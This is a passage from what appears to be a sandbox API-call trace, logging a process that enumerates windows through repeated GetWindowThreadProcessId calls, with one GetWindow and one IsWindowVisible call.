	[0446.928] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xc18
	[0446.928] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xc2c
	[0447.132] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xa1c
	[0447.132] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1244
	[0447.132] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xdb0
	[0447.132] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1398
	[0447.132] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1358
	[0447.133] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1370
	[0447.133] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1340
	[0447.133] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x130c
	[0447.133] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x12c0
	[0447.133] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x12e4
	[0447.133] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1270
	[0447.133] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1298
	[0447.133] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x120c
	[0447.133] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x122c
	[0447.133] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x11c4
	[0447.133] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x11b0
	[0447.134] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1188
	[0447.134] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1148
	[0447.134] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1160
	[0447.134] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x10fc
	[0447.134] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe34
	[0447.134] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xea4
	[0447.134] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x514
	[0447.134] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe48
	[0447.134] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xbc8
	[0447.134] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xdf8
	[0447.134] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x318
	[0447.135] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xcac
	[0447.135] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x8bc
	[0447.135] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xf9c
	[0447.135] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xf48
	[0447.135] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe40
	[0447.135] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xecc
	[0447.135] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xeb8
	[0447.135] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe80
	[0447.135] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe98
	[0447.135] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe60
	[0447.136] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xee4
	[0447.136] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xf00
	[0447.136] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xdf0
	[0447.136] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe1c
	[0447.136] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xdd0
	[0447.136] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xd94
	[0447.136] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xd74
	[0447.136] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xd00
	[0447.137] GetWindow (hWnd=0x10364, uCmd=0x4) returned 0x0
	[0447.138] IsWindowVisible (hWnd=0x10364) returned 0
	[0447.138] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xcd8
	[0447.138] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xc84
	[0447.138] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xca4
	[0447.138] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xc64
	[0447.138] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xc24
	[0447.138] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xb84
	[0447.138] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xbac
	[0447.138] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x384
	[0447.139] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xab8
	[0447.139] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x33c
	[0447.139] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xa44
	[0447.139] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xa64
	[0447.139] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x8a8
	[0447.139] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xaf0
	[0447.139] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x88c
	[0447.139] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xb04
	[0447.139] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x910
	[0447.139] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x230
	[0447.140] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xac0
	[0447.140] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xab4
	[0447.140] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xaac
	[0447.140] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x3d0
	[0447.140] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x978
	[0447.140] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xa7c
	[0447.140] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x59c
	[0447.140] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xa88
	[0447.140] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xa6c
	[0447.140] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xa68
	[0447.140] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x9f8
	[0447.141] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xa04
	[0447.141] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x924
	[0447.141] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x8dc
	[0447.141] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x7dc
	[0447.141] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x768
	[0447.141] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x764
	[0447.141] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x820
	[0447.141] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x810
	[0447.141] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x794
	[0447.141] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x83c
	[0447.141] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x7ac
	[0447.142] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xb44
	[0447.142] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xb5c
	[0447.142] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x838
	[0447.142] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.142] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.142] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.142] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.142] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.142] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.142] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.143] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.143] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x818
	[0447.143] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x5b8
	[0447.143] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x494
	[0447.143] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1ec
	[0447.143] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x440
	[0447.143] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x7e8
	[0447.143] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x730
	[0447.143] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x2c8
	[0447.143] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x31c
	[0447.143] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x330
	[0447.144] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x128
	[0447.144] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x5c8
	[0447.144] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x6f8
	[0447.144] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x358
	[0447.144] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x73c
	[0447.144] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xb0
	[0447.144] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x250
	[0447.144] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x240
	[0447.144] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x790
	[0447.144] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x61c
	[0447.145] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x540
	[0447.145] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x538
	[0447.145] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x568
	[0447.145] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x538
	[0447.145] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x568
	[0447.145] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x538
	[0447.145] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x540
	[0447.145] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x540
	[0447.145] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x57c
	[0447.145] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x460
	[0447.145] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x554
	[0447.146] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.146] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x528
	[0447.146] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.146] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.146] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.146] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x79c
	[0447.146] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.146] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4e0
	[0447.146] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.146] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x460
	[0447.147] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x460
	[0447.147] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x44c
	[0447.147] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x778
	[0447.147] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x460
	[0447.147] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x558
	[0447.147] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.147] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0447.147] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x15bc
	[0447.147] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x15a0
	[0447.147] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x159c
	[0447.148] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1598
	[0447.148] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1594
	[0447.148] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1590
	[0447.148] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x158c
	[0447.148] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1588
	[0447.148] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1584
	[0447.148] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1580
	[0447.148] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x157c
	[0447.149] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1488
	[0447.149] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1404
	[0447.149] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x11b8
	[0447.149] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xbd4
	[0447.149] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe0c
	[0447.149] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xd30
	[0447.149] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe70
	[0447.149] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x13b8
	[0447.149] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe20
	[0447.150] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe2c
	[0447.150] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe00
	[0447.150] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe04
	[0447.150] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xc94
	[0447.150] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x13b0
	[0447.150] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x13ac
	[0447.150] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x13a8
	[0447.150] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1374
	[0447.150] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x132c
	[0447.150] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1328
	[0447.150] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x12d0
	[0447.151] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x12cc
	[0447.151] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x12c8
	[0447.151] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1290
	[0447.151] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1218
	[0447.151] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1214
	[0447.151] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x11ec
	[0447.151] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x11e8
	[0447.151] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x11cc
	[0447.151] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1140
	[0447.151] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe6c
	[0447.152] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x6e8
	[0447.152] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xc6c
	[0447.152] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xf94
	[0447.152] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xffc
	[0447.152] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xf74
	[0447.152] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xf08
	[0447.152] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xf0c
	[0447.152] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xed8
	[0447.152] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe90
	[0447.152] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xea8
